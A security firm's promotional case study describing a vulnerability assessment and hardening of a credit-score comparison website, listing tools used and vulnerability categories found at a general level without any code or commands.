facebook twitter WhatsApp linkedin
Table of Content:

A case study of our vulnerability assessment and the mitigation process for a website that partnered with a credit bureau .

Executive Summary

  • Our client was a website that partnered with a credit bureau to provide services related to analyzing and comparing credit scores. They needed to ensure the safety and protection of the data from hackers.
  • We conducted a comprehensive evaluation of their system, network, and core components using various tools and techniques.
  • We identified and fixed several vulnerabilities and loopholes in the web layer, application layer, database, DNS server, firewalls, and traffic.
  • We provided reports with test results and solutions to the client and monitored the website for suspicious activities.
  • We achieved a secure website that met all the security standards and was free from potential threats and cyberattacks.

Introduction

Website security is a major concern for any business that deals with sensitive information. A simple security loophole could jeopardize the entire operation and hurt the business’s credibility. Therefore, it is essential to conduct regular cybersecurity vulnerability assessments to detect and fix any weaknesses in the system.

In this case study, we will describe how we helped our client secure their website from hackers using our 4-step process of mitigating risk.

Case & Client Profile

Our client was a website that partnered with a credit bureau to provide services related to analyzing and comparing credit scores. Due to the nature of the data involved, the client wanted to ensure complete safety and protection from vulnerabilities and possible attacks.

Challenges and Objectives

The client required us to perform a complete evaluation of their system, network, and all related core components. The evaluation involved detailed penetration and regression testing to detect and fix all the loopholes present in the infrastructure and application.

Our objective was to provide a secure website that met all security standards and was free from potential threats and cyberattacks.

Tools & Technologies Used

To complete this process, we used the following tools:

  • Apache HTTP Server
  • Detectify
  • Netscaler
  • OnWebChange
  • OWASP Zap
  • Quttera
  • Vega
  • VeraCode Scan
  • W3af

How We Solved the Situation

We followed our 4-step process of mitigating risk to secure the client's website:

1. Evaluate: We used the tools to evaluate the following elements of the website:

  • Database
  • DNS Server
  • Firewalls
  • Incoming Traffic
  • Outgoing Traffic
  • Source Code

We based our analysis on the most common techniques used by hackers, such as:

  • Backdoor exploitation
  • Brute Force Attacks
  • Defacement
  • Malware
  • Misconfiguration
  • Phishing
  • SEO Spam
  • Vulnerable Code
  • Vulnerable Extensions and Plugins

2. Fix: During the analysis, we found several instances of injected codes that were manipulating the source code of the web application according to the intent of the malicious entity. We completely removed them and applied fixes to the web layer and application layer.

For the web layer, we replaced the existing firewall with Citrix NetScaler AppFirewall, which has protection layers that protect any application from zero-day threats.

We also disabled several commands such as "ping,"  "telnet,"  "FTP,"  etc. on the Apache HTTPS server and enabled a web-links firewall to monitor the incoming and outgoing traffic. We checked and hardened the HTTPS server for issues such as:

  • Clickjacking
  • Directory listing enabling
  • Hidden directory detection
  • Unmasked NPI data
  • Weak SSL/TLS configuration.

As for the application layer, we evaluated it against the OWASP (Open Web Application Security Project) Top 10 common vulnerabilities and found issues such as:

  • Client-Side JavaScript Cookie Reference
  • Cross-Site Scripting Vulnerabilities (XSS)
  • CRLF Injection
  • Email Spoofing
  • HTTP-Only Cookie Attribute Not Set
  • Invalid HTML Content
  • SQL Injection
  • Unencrypted Login Sessions
  • Unrestricted File Upload
  • Weak Password Policy

We created a report that contained the test results and possible solutions and provided it to the client.

3. Scan: After fixing all the found vulnerabilities and loopholes, we used OWASP Zap, W3af, Vega, Quttera, and Detectify to scan and evaluate further. We also started monitoring the website using OnWebChange for suspicious activities on the website. The software also provides alert options for emails, pushovers, or an HTTP callback.

4. Test: After all the vulnerabilities were found and fixed, we ran another manual pen test as a finishing touch. The goal of the test was to evaluate the entire website from a security standpoint. We found a few more minor issues noted in a second report, along with other details. We handed over the report to the client for immediate remedies.

 

Results

The client was highly satisfied with our vulnerability assessment services. Once we completed our process, their website was finally up to all security standards and safe from all sorts of potential threats and cyberattacks. They appreciated our efficiency and professionalism in securing their website with sensitive data.

Conclusion

This case study demonstrated how we successfully secured a website with sensitive data from cyberattacks using our 4-step process of mitigating risk. We evaluated, fixed, scanned, and tested the website for various vulnerabilities and loopholes using various tools and techniques.

After completing the tests, we provided reports to the client with test results and solutions. We also monitored the website for further suspicious activities. In the end, we achieved a secure website that met all the security standards while being free from all potential threats and cyberattacks.

This case study shows the importance of conducting regular cybersecurity vulnerability assessments to protect websites and data from hackers.

TechForing Cybersecurity Vulnerability Assessment Service

Techforing provides a white-glove cybersecurity service that includes cybersecurity Vulnerability Assessment and Penetration testing Services. It is applicable for both you and the digital assets of your organization. Just E-mail us or contact us. Also, you can learn more from our other case studies.

GET OUR BEST IDEAS AND LATEST UPDATES TO YOUR INBOX

We’ll send our best articles, videos, and exclusive content right to your inbox. It’s free.